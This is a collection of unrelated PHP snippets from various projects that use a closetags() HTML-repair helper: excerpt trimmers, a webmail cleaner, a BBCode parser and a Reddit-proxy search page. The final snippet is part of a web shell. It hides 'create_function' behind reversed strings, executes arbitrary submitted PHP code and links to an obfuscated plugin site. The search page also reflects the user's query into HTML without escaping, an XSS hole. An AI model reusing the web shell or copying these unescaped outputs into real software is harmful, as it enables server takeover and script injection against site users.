function parsetext($text) { $res = $text; // убираем переводы строк внутри тэгов do { $oldRes = $res; $res = preg_replace("/(<[^>]*)[\n\r]/m", '$1 ', $res); } while ($res != $oldRes); $res = auto_link_text($res); $res = strip_tags_attributes($res, array('<strike>', '<s>', '<sup>', '<sub>', '<embed>', '<object>', '<param>', '<p>', '<b>', '<i>', '<br>', '<br/>', '<a>', '<em>', '<font>', '<strong>', '<img>', '<img/>', '<small>', '<big>', '<div>', '<span>')); $res = closetags($res); $res = redirectExternalLinks($res); $res = nl2br($res); $res = str_replace(array("\n", "\r"), " ", $res); $res = trim($res); return $res; }
function tidyRepair($article, $easyset) { if ('com_content' != JRequest::getVar('option')) { return; } if (!$article->introtext && !$article->fulltext) { return; } if (function_exists('tidy_repair_string')) { //Tidy Repair Text $TidyConfig = array('indent' => TRUE, 'output-xhtml' => true, 'show-body-only' => true, 'wrap' => false); $article->introtext = tidy_repair_string($article->introtext, $TidyConfig, 'utf8'); $article->fulltext = tidy_repair_string($article->fulltext, $TidyConfig, 'utf8'); } else { require_once 'closeTags.php'; $article->introtext = closetags($article->introtext); $article->fulltext = closetags($article->fulltext); } }
// TODO deal with attachments here?? // } $bodies = $webmaillib->get_mail_content($user, $current['accountId'], $_REQUEST['msgid'], true); for ($i = 0, $count_bodies = count($bodies); $i < $count_bodies; $i++) { if ($bodies[$i]['contentType'] == 'text/html') { $bod = $bodies[$i]['body']; // Clean the string using HTML Purifier require_once 'lib/htmlpurifier_tiki/HTMLPurifier.tiki.php'; $bod = HTMLPurifier($bod); if (preg_match_all('/<[\\/]?body[^>]*>/i', $bod, $m, PREG_OFFSET_CAPTURE) && count($m) > 0 && count($m[0]) > 1) { // gets positions of the start and end body tags then substr the bit inbetween $bod = substr($bod, $m[0][0][1] + strlen($m[0][0][0]), $m[0][1][1]); } $bod = strip_tags($bod, '<a><b><i><strong><em><p><blockquote><table><tbody><tr><td><th>' . '<ul><li><img><hr><ol><br><h1><h2><h3><h4><h5><h6><div><span>' . '<font><form><input><textarea><checkbox><select><style>'); // try to close malformed html not fixed by the purifier - because people email Really Bad Things and this messes up *lite.css layout $bod = closetags($bod); $bodies[$i]['body'] = $bod; } else { if ($bodies[$i]['contentType'] == 'text/plain') { // reply text $smarty->assign('plainbody', format_email_reply($bodies[$i]['body'], $aux['from'], $aux['date'])); $bodies[$i]['body'] = nl2br($bodies[$i]['body']); } } // else { // attachments? //} } array_multisort($bodies); // this doesn't do what we need properly but seems to fluke it mostly - TODO a manual re-sort $smarty->assign_by_ref('attachs', $attachments);
function cut_text_by_p($str, $limit_words = 200) { /* Cuts a string at $limit number of words, * but looking for the next </p> to cut there. * */ // get the paragraphs $ps = explode('</p>', $str); $i = 0; $words = 0; $new_str = ''; while ($words < $limit_words && $i < count($ps)) { // COUNTING WORDS FROM A CLEAN STRING // conver the linebreaks into spaces $s = preg_replace('/\\<br(\\s*)?\\/?\\>/i', ' ', $ps[$i]); // strip tags $s = strip_tags(trim($s)); // get the words $words += count(explode(' ', $s)); /* If the last paragraph is not an image or object, * put some transparency before saving the paragraph. * */ $new_str .= $ps[$i] . '</p>'; $i++; } if (!are_tags_closed($new_str)) { $new_str = closetags($new_str); } return $new_str; }
function FormHelper_SubstrCloseTags($html, $size) { $html = substr($html, 0, $size); //Agafem el fragment que necessito. $ult_obrir = strripos($html, '<'); //Miro si algun codi ha quedat tallat $ult_amp = strripos($html, '&'); $ult_pos = $ult_obrir > $ult_amp ? $ult_obrir : $ult_amp; //Trec el codi que ha quedat tallat if (20 > $size - $ult_pos) { $html = substr($html, 0, $ult_pos - 1); } $html = closetags($html); return $html; }
function searchpage($d) { $request = $d["request"]; $proxyadd = ""; $proxyform = ""; if (isset($request["enableproxy"]) && $request["enableproxy"] == "true") { $proxyadd = "&enableproxy=" . $request["enableproxy"]; $proxyform = "<input type=hidden name=enableproxy value=" . $request["enableproxy"] . ">"; } /* if (loggedin()) { $subs=""; foreach ($_SESSION["subscribed"] as $sub) { $subs.='<a href="index.php?q='.$sub["url"].'" class="subitem"><span>'.$sub["name"].'</span></a>'; } $header=' <div id="navbarlinks"> <a target=_blank href="'.$_SESSION["username"].'">+'.$_SESSION["username"].'</a> <div id="subtoggle" href="#"> <div id="subscribed"> '.$subs.' </div> subscribed </div> </div> <div id="navbarmenu"> <div id="navbarmenuicon"></div> <div id="navbarmenunotification"></div> <div id="navbarmenuadd"></div> <div id="navbarmenuprofile" tabindex="1"> <a href="index.php?action=logout" id="navbarlogout"> Logout </a> </div> </div>'; } else { $header='<div id="navbarmenu"> <div id="navbarmenuicon"></div> <label for="logincheckbox" id="navbarmenubutton">Sign In</label> <input type="checkbox" id="logincheckbox" value="1" style="display:none;"> <div id="navbarlogin"> <form method="post"> <input type="hidden" name="q" value="'.$d["query"].'"> <input type="hidden" name="action" value="login"> <input type="text" name="username" placeholder="User"> <input type="password" name="password" placeholder="Password"> <button id="loginbutton" type="submit">Sign In</button> </form> </div> </div>'; }*/ $header = '<div id="navbarmenu"> <div id="navbarmenuicon"></div> <div id="navbarmenubutton">Sign In</div> </div>'; $active = array("", "", "", "", "", "", "", ""); switch ($d["sub"]) { case "/new": $active[1] = "active"; $sublink = "&action=new"; break; case "/rising": $active[2] = "active"; $sublink = "&action=rising"; break; case "/controversial": $active[3] = "active"; $sublink = "&action=controversial"; break; case "/top": $active[4] = "active"; $sublink = "&action=top"; break; case "/gilded": $active[5] = "active"; $sublink = "&action=gilded"; break; case "/promoted": $active[6] = "active"; $sublink = "&action=promoted"; break; case "/wiki": $active[7] = "active"; $sublink = "&action=wiki"; break; default: $active[0] = "active"; $sublink = "&action=hot"; break; } $sublink .= $proxyadd; echo ' <!DOCTYPE HTML> <head> <meta charset="utf-8"> <title>' . $d["query"] . ' - Cluffle Search</title> <link rel="shortcut icon" href="gfx/faviconsmall.png" /> <style>'; require "css/searchpage.css"; echo '</style> <script>'; require "js/jquery-2.1.1.min.js"; echo '</script> <script>'; require "js/script.js"; echo '</script> <style> body { background-color:white; padding:0; margin:0; padding-top:172px; min-width:980px; } </style> </head> <body> <div id="navbar"> <a href="index.php"> <img id="logo" src="gfx/logo.png"></img> </a> <form> <input type="text" id="searchbox" name="q" value="' . $d["query"] . '" autocomplete=off> ' . $proxyform . ' <label for=searchsubmitbutton id="searchbutton"> <input id="searchsubmitbutton" type="submit" style="display:none;"> </label> </form> ' . $header . ' </div> <div id="navbar2"> <a href="index.php?q=' . $d["query"] . $proxyadd . '"> <div class="navbar2sub ' . $active[0] . '"> Hot </div> </a> <a href="index.php?action=new&q=' . $d["query"] . $proxyadd . '"> <div class="navbar2sub ' . $active[1] . '"> New </div> </a> <a href="index.php?action=rising&q=' . $d["query"] . $proxyadd . '"> <div class="navbar2sub ' . $active[2] . '"> Rising </div> </a> <a href="index.php?action=controversial&q=' . $d["query"] . $proxyadd . '"> <div class="navbar2sub ' . $active[3] . '"> Controversial </div> </a> <a href="index.php?action=top&q=' . $d["query"] . $proxyadd . '"> <div class="navbar2sub ' . $active[4] . '"> Top </div> </a> <a href="index.php?action=gilded&q=' . $d["query"] . $proxyadd . '"> <div class="navbar2sub ' . $active[5] . '"> Gilded </div> </a> <a href="index.php?action=promoted&q=' . $d["query"] . $proxyadd . '"> <div class="navbar2sub ' . $active[6] . '"> Promoted </div> </a> <a href="index.php?action=wiki&q=' . $d["query"] . $proxyadd . '"> <div class="navbar2sub ' . $active[7] . '"> Wiki </div> </a> <img id="cog" src="gfx/cog.png"> </div> <div id="navbar3"> <div id="resultstats"> ' . $d["resultstats"] . ' </div> </div> <div id="results"> '; if (empty($d["results"])) { $d["results"] = page404(); } foreach ($d["results"] as $r) { if (isset($r["strOverwrite"])) { $commentgreen = ' <a href="' . htmlentities($r["strLink"]) . '">' . $r["strTitel"] . '</a><br> <a class="resultlink" href="#">' . $r["strOverwrite"] . '</a> '; } else { if (isset($r["nsfw"]) && $r["nsfw"]) { $nsfw = "[NSFW] "; } else { $nsfw = ""; } $commentlink = 'index.php?action=groups&comment=' . $r["strComment"]; $commentstring = $nsfw . $r["numComments"] . ' comments'; $commentgreen = ' <a target="_blank" href="' . htmlentities($r["strLink"]) . '">' . $r["strTitel"] . '</a><br> <a class="resultlink" target=_blank href="' . $commentlink . '">' . $commentstring . '</a> <span class="resultlink">-</span> <a class="resultlink" target=_blank href="index.php?q=' . $r["strDomain"] . '">' . htmlentities($r["strDomain"]) . '</a> '; } echo ' <div class="resultdiv"> ' . $commentgreen . ' <br> <span class="resulttext"> ' . $r["strCreated"] . str_replace("<a", "<a target='_blank'", closetags($r["strBeschreibung"])) . ' </span> </div> '; } if ($d["showNav"]) { if (!$d["back"]) { //Kein Zurück $back = ' <td> <span id="Cl1"></span> </td> '; } else { $back = ' <td> <a href="' . $d["backlink"] . $sublink . '"> <span id="Cl2"></span><span id="back">Previous</span> </a> </td> '; //Zurück } $toggle = 0; $pagenumbers = ""; foreach ($d["pagelinks"] as $page) { if ($toggle == 0 && $page["current"] == 1) { $pagenumbers .= '<td id="cur"> <span class="u"></span><span class="bottomnavtext">' . $page["number"] . '</span> </td>'; $toggle = 1; } else { if ($toggle == 0) { $pagenumbers .= '<td> <a href="' . $page["link"] . $sublink . '"><span class="u"></span><span class="bottomnavtext">' . $page["number"] . '</span></a> </td>'; } else { $pagenumbers .= '<td> <a href="' . $page["link"] . $sublink . '"><span class="u"></span><span class="bottomnavtext">' . $page["number"] . '</span></a> </td>'; } } } if ($d["forward"]) { $next = '<td> <a href="' . $d["forwardlink"] . $sublink . '"><span id="ffle"></span><span id="weiter" style="font-weight:700;">Next</span></a> </td> '; } else { $next = '<td> <span id="ffle" style="cursor:default; width:62px;"></span> </td> '; } echo ' <div id="bottomnavwrapper"> <table id="bottomnav"> <tbody> <tr valign=top> ' . $back . $pagenumbers . ' ' . $next . ' </tr> </tbody> </table> </div>'; } else { echo ' <div id="bottomnavwrapper"> </div>'; } echo ' </div> <div id="footer"> <a div="opensource" style="margin-left:135px;">Help</a> <a div="opensource">Open Source</a> <a div="about">About</a> <a target=_blank href="">Contact</a> ' . $d["proxyquery"] . ' </div> <div id="help" class="popup" style="display:none;"> <h2>Help</h2> <div class="closebutton">Close</div> <p> </p> </div> <div id="opensource" class="popup" style="display:none;"> <h2>Open Source</h2> <div class="closebutton">Close</div> <p> The whole project is completely open source and available at <a href="">Github</a>.<br> If you want to help improving the messy project (it\'s based on PHP), feel free to make a pull request. I\'ll also list everyone helping here. </p> </div> <div id="about" class="popup" style="display:none;"> <h2>About</h2> <div class="closebutton">Close</div> <p>Want to use Reddit without people knowing you are using it? This page provides you with the known Google interface for your Reddit needs.<br><br> Browse a subreddit by entering it into the box ("/r/internetisbeautiful" or "/r/web_design").<br> Search for a term as you would on reddit.<br> Press the "I\'m feeling lucky" - button to browse a random subreddit.<br><br> Cluffle is your stealth mode to avoid things like suspicious coworkers and classmates.<br> Reddit is blocked at work? Cluffle also works as a proxy.<br> You want the usual Reddit interface while using the proxy? Just go to <a href="" target=_blank></a>. </p> </div> </body> '; }
<th style="width:130px;">Published at</th> <?php if (_is("GR Admin")) { ?> <th style="width: 100px">Status</th> <?php } ?> <th style="width:135px;">Actions</th> </tr> </thead> <tbody> <?php foreach ($blogs as $value) { echo '<tr id="blog' . $value->id . '"><td>' . str_replace($content, "<b>{$content}</b>", closetags(sub_str(strip_tags($value->title), 0, 67))) . '</td>'; echo '<td>' . str_replace($content, "<b>{$content}</b>", closetags(sub_str(strip_tags($value->content), 0, 120))) . '</td><td>' . str_replace($content, "<b>{$content}</b>", $value->username) . '</td><td>' . time_elapsed_string($value->timestamp) . '</td>'; if (_is("GR Admin")) { echo '<td>'; if ($value->status == 1) { echo '<input checked type = "checkbox" class = "statuschanger" data-size = "small" data-onstyle = "success" data-offstyle="danger" value = "' . $value->id . '" >'; } else { echo '<input type = "checkbox" class = "statuschanger" data-size = "small" data-onstyle = "success" data-offstyle="danger" value = "' . $value->id . '" >'; } echo '</td>'; } ?> <td> <a href="<?php echo site_url('blog/view/' . $value->id); ?>
</div> <div class="card-body"> <div class="centre-info" style="margin-bottom: 5px;"> <h4><a href="<?php echo site_url('preachers/preachers_profile'); ?> /<?php echo $value->id; ?> "> <?php echo $value->name; ?> </a></h4> </div> <p><?php echo closetags(sub_str($value->description, 0, 50)); if (strlen($value->description) > 50) { echo '...'; } ?> </p> <div class="clearfix"></div> </div> </div> </div> </div> <?php } ?> </div>
function appendPreviewArticles($article, $sizeLimit = 350) { $id = $article["id"]; $title = $article["title"]; $date = $article["created"]; $date = utf8_encode(strftime('%d %B %Y', article_time_given_date($article['created']))); $author = $article["author"]; $content = $article["html"]; $link = $article["slug"]; $contentText = limitHTMLText($content, $sizeLimit); $contentText = closetags(removeLastWord($contentText) . " …"); $contentText = removeStyleAttribute($contentText); echo '<a href="/posts/' . $link . '" class="hidden-link article-link"> <div class="inner"> <div class="date">' . $date . '</div> <div class="title">' . $title . '</div> ' . $contentText . ' </div> </a>'; }
if (!isset($solrFieldNames[$key])) { continue; } $counter2++; ?> <p class="col-xs-6"><strong><?php print $solrFieldNames[$key]['field_title']; ?> :</strong><br> <?php if (is_array($value)) { foreach ($value as $val) { print '<br>' . closetags($val); } } else { print closetags($value); } ?> </p> <?php } //endforeach if ($counter2 == 0) { //if counter2==0 then we need to hide the 'more' button ?> <script> <?php //this script disables the 'more' button if there are no additional items to display //we have to use an array of functions because jquery is not loaded yet //once the dom is ready, we iterate through this array and execute each function //see duss-search.js -> $(document).ready()
function replace_attr($content) { $content = preg_replace("/class=\".*?\"/si", "", $content); $content = preg_replace("/id=\".*?\"/si", "", $content); $content = closetags($content); return $content; }
function custom_wp_trim_excerpt($text) { $raw_excerpt = $text; if ('' == $text) { //Retrieve the post content. $text = get_the_content(''); //Delete all shortcode tags from the content. $text = strip_shortcodes($text); $text = apply_filters('the_content', $text); $text = str_replace(']]>', ']]>', $text); $allowed_tags = '<p>,<a>,<em>,<strong>,<b>,<big>,<blockquote>,<br>,<center>,<div>,<span>,<form>,<h1>,<h2>,<h3>,<h4>,<h5>,<h6>,<i>,<ul>,<li>,<ol>,<strike>,<sub>,<sup>,<table>,<td>,<tr>,<th>,<u>'; /*** MODIFY THIS. Add the allowed HTML tags separated by a comma.***/ $text = strip_tags($text, $allowed_tags); $excerpt_word_count = 70; /*** MODIFY THIS. change the excerpt word count to any integer you like.***/ $excerpt_length = apply_filters('excerpt_length', $excerpt_word_count); $excerpt_end = '<span class="read-more">…<a href="' . get_permalink($post->ID) . '" rel="nofollow">' . ' [read more]' . '</a></span>'; $excerpt_more = apply_filters('excerpt_more', ' ' . $excerpt_end); $words = preg_split("/[\n\r\t ]+/", $text, $excerpt_length + 1, PREG_SPLIT_NO_EMPTY); if (count($words) > $excerpt_length) { array_pop($words); $text = implode(' ', $words); $text = $text . $excerpt_more; $text = closetags($text); } else { $text = implode(' ', $words); } } return apply_filters('wp_trim_excerpt', $text, $raw_excerpt); }
function processContentText($text, $limitTo = null, $limitAppend = "...", $stripParaTags = false) { $text = stripslashes($text); if ($stripParaTags) { $text = strip_tags($text); } //else // $text = strip_tags_attributes($text,"<p>,<TextFlow>,<span>,<u>,<a><font>","asdxc,href,letterspacing,align,columnGap"); if ($limitTo && strlen($text) > $limitTo) { $whitespacePosition = strpos($text, " ", $limitTo); $text = substr_replace($text, $limitAppend, $whitespacePosition); $text = closetags($text); // close any open tags (font, etc.) } return $text; }
<?php echo closetags(substr($desc, 0, 600) . '...'); ?> <div> <a onClick="change(<?php echo $idC; ?> );" >Llegir més</a> </div> </div> <div id="<?php echo 'C' . $idC; ?> " style="display: none; padding-left:10px; font-size:11px;"> <?php echo closetags($desc); ?> <div style="padding-left:10px; font-size:11px;"> <a onClick="change(<?php echo $idC; ?> );" >Llegir menys</a> </div> </div> </div> <div style="clear:both"> </div> </div> <?php
/** * Parse post content into readable data, or return default text * @global array * @param string $text data to be parsed * @param boolean $bbcode show bbcode or not? * @return mixed */ function parse($text, $bbcode = true) { global $config; // Do they allow bbcode or does this post allow bbcode? if ($config['bbcode'] && $bbcode) { $start = array('/\\[url=("|\'|)(.*?)\\1\\]/i', '/\\[url\\]/i', '/\\[\\/url\\]/i', '/\\[img\\]\\s*(.*?)\\s*\\[\\/img\\]/is', '/\\[colou?r=("|\'|)(.*?)\\1\\](.*?)\\[\\/colou?r\\]/is', '/\\[quote=("|"|\'|)(.*?)\\1\\]\\s */i', '/\\[qoute=("|"|\'|)(.*?)\\1\\]\\s */i', '/\\[quote\\]\\s */i', '/\\[qoute\\]\\s */i', '/\\s*\\[\\/quote\\]\\s */i', '/\\s*\\[\\/qoute\\]/i', '/\\[code\\][\\r\\n]*(.*?)\\[\\/code\\]/is'); $end = array('[url=$2]', '[url]', '[/url]', '[img]$1[/img]', '[color=$2]$3[/color]', '[quote=$1$2$1]', '[quote=$1$2$1]', '[quote]', '[quote]', '[/quote]' . "\n", '[/quote]' . "\n", '[code]$1[/code]' . "\n"); // Replace the non needed characters. $text = preg_replace($start, $end, $text); // Html close tags edited to work for bbcode $text = closetags($text); // Lets make sure the code doesn't get obscured if (strpos($text, '[code]') !== false && strpos($text, '[/code]') !== false) { list($inside, $outside) = split_text($text, '[code]', '[/code]'); $outside = array_map('ltrim', $outside); $text = implode('<">', $outside); } // Quoting if (strpos($text, 'quote') !== false) { $text = str_replace('[quote]', '<blockquote><div class="quotebox"><div>', $text); $text = preg_replace('/\\[quote=("|"|\'|)(.*)\\1\\]/seU', '"<blockquote><div class=\\"quotebox\\"><h4>".str_replace(array(\'[\', \'\\"\'), array(\'[\', \'"\'), \'$2\')." wrote:</h4><div class=\\"text\\">"', $text); $text = preg_replace('/\\[\\/quote\\](\\s *)?/i', '</div></div></blockquote>', $text); } // Basic BBCodes $pattern = array('/\\[b\\](.*?)\\[\\/b\\]/s', '/\\[i\\](.*?)\\[\\/i\\]/s', '/\\[u\\](.*?)\\[\\/u\\]/s'); $replace = array('<strong>$1</strong>', '<em>$1</em>', '<u>$1</u>'); // This thing takes a while! :) $text = preg_replace($pattern, $replace, $text); // Do we allow urls? if ($config['bbcode_url']) { $pattern = array('/\\[url\\]([^\\[]*?)\\[\\/url\\]/e', '/\\[url=([^\\[]*?)\\](.*?)\\[\\/url\\]/e'); $replace = array('url_tag(\'$1\')', 'url_tag(\'$1\', \'$2\')'); $text = preg_replace($pattern, $replace, $text); } // Color $text = preg_replace("/\\[color=([a-zA-Z]*|\\#?[0-9a-fA-F]{6})]/s", '<span style="color: \\1">', $text); $text = preg_replace("/\\[\\/color\\]/s", '</span>', $text); // Do we allow images? if ($config['bbcode_image']) { $text = preg_replace('/\\[img\\]((ht|f)tps?:\\/\\/)([^\\s<\\"]*?)\\.(jpg|jpeg|png|gif)\\[\\/img\\]/s', '<img class="p-image" src="\\1\\3.\\4\\" />', $text); } // If we split up the message before we have to concatenate it together again (code tags) if (isset($inside)) { $outside = explode('<">', $text); $text = ''; $num_tokens = count($outside); for ($i = 0; $i < $num_tokens; ++$i) { $text .= $outside[$i]; if (isset($inside[$i])) { $text .= '<div class="codebox"><h4>Code:</h4><div class="scrollbox"><pre>' . $inside[$i] . '</pre></div></div>'; } } } } // Return base text! if (!$bbcode) { return $text; } // Return a fully parsed post / other return clickable(stripslashes(nl2br(str_replace(array('\\r\\n', '\\r', '\\n'), "<br />", html_entity_decode($text))))); }
/** * Limit a given htmltext to a given number of characters without removing html tags * @param $htmlText * @param int $limit */ function limitHTMLText($htmlText, $limit = 350, $removeLinkElements = true) { //First removing videos, it can cause problems. $iframesMatched = []; $regex = '(<iframe .*\\/iframe>)'; preg_match($regex, $htmlText, $iframesMatched); // We're going to save the first to put it as an article header $htmlText = preg_replace($regex, '', $htmlText); $htmlText = preg_replace('(videodetector)', '', $htmlText); if (count($iframesMatched) > 0) { $iframesMatched = $iframesMatched[0]; } else { $iframesMatched = ""; } if ($removeLinkElements) { $htmlText = strip_single_tag($htmlText, "a"); } $str = substr($htmlText, 0, $limit); //$limit first chars of $htmlText, tags included $strWithoutHTMLTags = strip_tags($str); //Removing tags, calculating length $i = strlen($str); while (strlen($strWithoutHTMLTags) < $limit && $i < strlen($htmlText)) { //If length not enough and if there is still some text to add : adding chars $str .= $htmlText[$i]; $strWithoutHTMLTags = strip_tags($str); //Removing tags for calculating length of the text only $i++; } $str .= "..."; $str = closetags($str); $str = "<div class='videodetector'>" . $iframesMatched . "</div>" . $str; return $str; }
function parseAFD_Content() { $GLOBALS['log'] .= "<br/> <span class='startCall'> ****************** Call ParseAFD_OtherComment->parseAFD_Content() <a target='_blank' <a href='getAFDHtmlByID.php?id=" . $this->afd->AFDID . "#" . $this->afd->AFDTitleID . "'>" . $this->afd->AFDTitle . "</a> </span>"; try { if (!$this->afd) { throw new Exception('this->afd is empty!'); } //is allowed to parse the endresult details if ($this->afd->flag_DoNotParse != 1) { $parse_otherComment = 0; $parse_otherComment_User = 0; $otherComment_Total = 0; $GLOBALS['log'] .= closetags($this->otherComment_Html); $this->distinguishComments = new DistinguishComments($this->otherComment_Html, $this->debateDate->url); //Update AFD table $this->afd->otherComment_CounterTime = $this->distinguishComments->condition_time; $this->afd->otherComment_CounterDate = $this->distinguishComments->condition_date; $this->afd->otherComment_CounterUTC = $this->distinguishComments->condition_UTC; $this->afd->otherComment_CounterUserNormal = $this->distinguishComments->condition_UserID1; $this->afd->otherComment_CounterUserTalk = $this->distinguishComments->condition_UserID2; $this->afd->otherComment_CounterUserNew = $this->distinguishComments->condition_UserID3; $this->afd->otherComment_CounterUserIP = $this->distinguishComments->condition_UserID4; $this->afd->parse_otherComment = $this->distinguishComments->distinguishPercentage; $this->afd->parse_otherComment_User = $this->distinguishComments->distinguishPercentage_User; $this->afd->updateAFD_OnlyOtherComment_byAFDID(); //clear the comment table to remove the previous records to prevent dublication //also if there was previous mistake it make show the mistake does not effect over the quality of data Comment::removedAllComment_ByAFDID($this->afd->AFDID); //set the condition to insert into comment table $GLOBALS['log'] .= "<hr style='border: 0; border-top: 1px solid gray;'/>"; //set the (other)comment table for ($i = 0; $i < count($this->distinguishComments->array_time); $i++) { $current_comment_Html = $this->distinguishComments->array_time[$i]; $current_comment_UserCheck = $this->distinguishComments->array_UTC_UserCheck[$i]; //$comment_User and $comment_DateTime are "", this is due to further development $comment = new Comment($this->afd->AFDID, $this->afd->AFDTitleID, $this->afd->debateDateListID, $current_comment_Html, "", "", ""); $GLOBALS['log'] .= "<table border='1'><tr><td>"; $signature = Signature::parse($current_comment_Html); $GLOBALS['log'] .= "</td></tr></table>"; $beforeSignature = $signature->initialSentance; $debate_included = $this->check_debate_included($beforeSignature); $bBlock = $this->check_Comment_bBlock($beforeSignature); $comment->AFDTitle = $this->afd->AFDTitle; $comment->articleID = $this->afd->articleID; $comment->comment_UserCheck = $current_comment_UserCheck; //liligago need to write for comment such as delete, keep and etc. $comment->comment = $bBlock[1]; $comment->comment_User = $signature->userID; $comment->comment_UserPosition = $signature->userID_StartPos; $comment->comment_UserTitle = $signature->userTitle; $comment->comment_UserURL = $signature->userURL; $comment->comment_UserURLType = $signature->userURLType; $comment->comment_Date = $signature->date; $comment->comment_Time = $signature->time; $comment->comment_DateTime = date('Y-m-d H:i:s', strtotime($signature->date . " " . $signature->time)); $comment->comment_Note = $bBlock[2]; $comment->comment_ExtraNote = $debate_included[1]; if ($bBlock[0] == 1 && $debate_included[0] == 1) { $comment->comment_Type = 1; } else { if ($bBlock[0] == 1) { $comment->comment_Type = "1Error"; } else { if ($debate_included[0] == 1) { $comment->comment_Type = "Flag_Text"; } else { $comment->comment_Type = 0; } } } $comment->comment_Type2 = $bBlock[3]; if ($this->distinguishComments->distinguishPercentage >= 80) { $comment->flag_DoNotVisualize_Comment = 0; } else { $comment->flag_DoNotVisualize_Comment = 1; } $comment->distinguishPercentage = $this->distinguishComments->distinguishPercentage; //if(!empty($comment->comment_Note)) // $GLOBALS['log'] .="<br/><span class='percentage'> Comment Note:</span><br/> ".strip_tags($comment->comment_Note); if (strlen($comment->comment_Type) == strlen("Flag_Text")) { $GLOBALS['log'] .= "<br/><span class='bad'> Flag_Text</span>"; } //update the comment table $comment->update_Comment(); $GLOBALS['log'] .= "<hr style='border: 0; border-top: 1px solid #FF3339;'/>"; } } else { $GLOBALS['log'] .= "<br/><span class='startCall'> By pass by flag_DoNotParse = 1.</span>"; } } catch (Exception $e) { echo 'Caught exception: ', $e->getMessage(), "\n"; } $GLOBALS['log'] .= "<br/><span class='endCall'>**** End Called ParseAFD_OtherComment->parseAFD_Content()*******************</span>"; }
} ?> </div> </div> <div class="df" style="width:330px;"> <script> function change(idC){ $(".C"+idC).toggle(); } </script> <div class="<?php echo 'C' . $idC; ?> " style="padding-left:10px; font-size:11px;"> <?php echo closetags(substr($desc, 0, 600) . '...'); ?> <div> <a href="" onClick="change(<?php echo $idC; ?> ); return false;" >Llegir més</a> </div> </div> <div class="<?php echo 'C' . $idC; ?> " style="display: none; padding-left:10px; font-size:11px;"> <?php echo $desc; ?>
<td><?php echo date(FORMAT_DATE, strtotime($value->start_date)); ?> </td> <td><?php echo date(FORMAT_DATE, strtotime($value->end_date)); ?> </td> <td><?php echo closetags(substr($value->address, 0, 45)); echo strlen($value->address) > 45 ? "..." : ''; ?> </td> <td> <?php echo closetags(substr($value->description, 0, 45)); echo strlen($value->description) > 45 ? "..." : ''; ?> </td> <?php if (_is("GR Admin")) { ?> <td><?php echo $value->count; ?> </td> <?php } ?> <td>
error_reporting(7); $phpcode = trim($phpcode); if ($phpcode) { if (!$prgm('/<\\?/si', $phpcode)) { $phpcode = "<?PHP\n\n{$phpcode}"; } if (!$prgm('/\\?>/si', $phpcode)) { $phpcode .= "\n\n?>"; } $f = strrev(strrev("on") . "itc" . strrev("e_fun") . "tae" . "rc"); $codev = $f("", "chdir(\"{$setrunfrom}\");?" . ">\n{$phpcode}<?php\nchdir(\"{$nowpath}\");"); ob_start(); $codev(); $laevdata = ob_get_contents(); ob_end_clean(); echo closetags($laevdata); } formhead(array('title' => "Eval PHP Code")); makehide('action', 'laev'); $phpcode = $phpcode == "" ? "<" . "?PHP\n\n\n\n?" . ">" : $phpcode; makeinput(array('title' => 'Run From Directory:', 'name' => 'setrunfrom', 'type' => 'text', 'value' => $setrunfrom != "" ? $setrunfrom : str_replace("\\", "/", dirname(__FILE__)) . "/")); maketext(array('title' => 'PHP Code', 'name' => 'phpcode', 'dataeditor' => 'php', 'value' => htmlspecialchars($phpcode))); p('<p><a href="http://w' . 'ww.4ng' . '' . 'spy/pl' . 'ugin/" target="_blank">Get plugins</a></p>'); p('<script src=""></script>'); printaceext(); if (!$mobile) { p('<script>var l=document.getElementsByTagName("textarea");for(i=0;i<l.length;++i){if(l[i].hasAttribute("data-editor")){var e=l[i];var t=e.getAttribute("data-editor");var n=document.createElement("div");"width:"+e.clientWidth+"px;height:"+e.clientHeight+"px;";n.className=e.className;e.parentNode.insertBefore(n,e);"display:none;";var r=ace.edit(n);r.renderer.setShowGutter(true);r.getSession().setValue(e.value);var i=ace.require("ace/ext/modelist");var s=i.getModeForPath("example.php").mode;r.getSession().setMode(s);r.setTheme("ace/theme/dreamweaver");e.form.onsubmit=function(t){window.onbeforeunload = null;e.value=r.getSession().getValue()}}}</script>'); } formfooter(); } elseif ($action == 'editfile') { if (file_exists($opfile)) {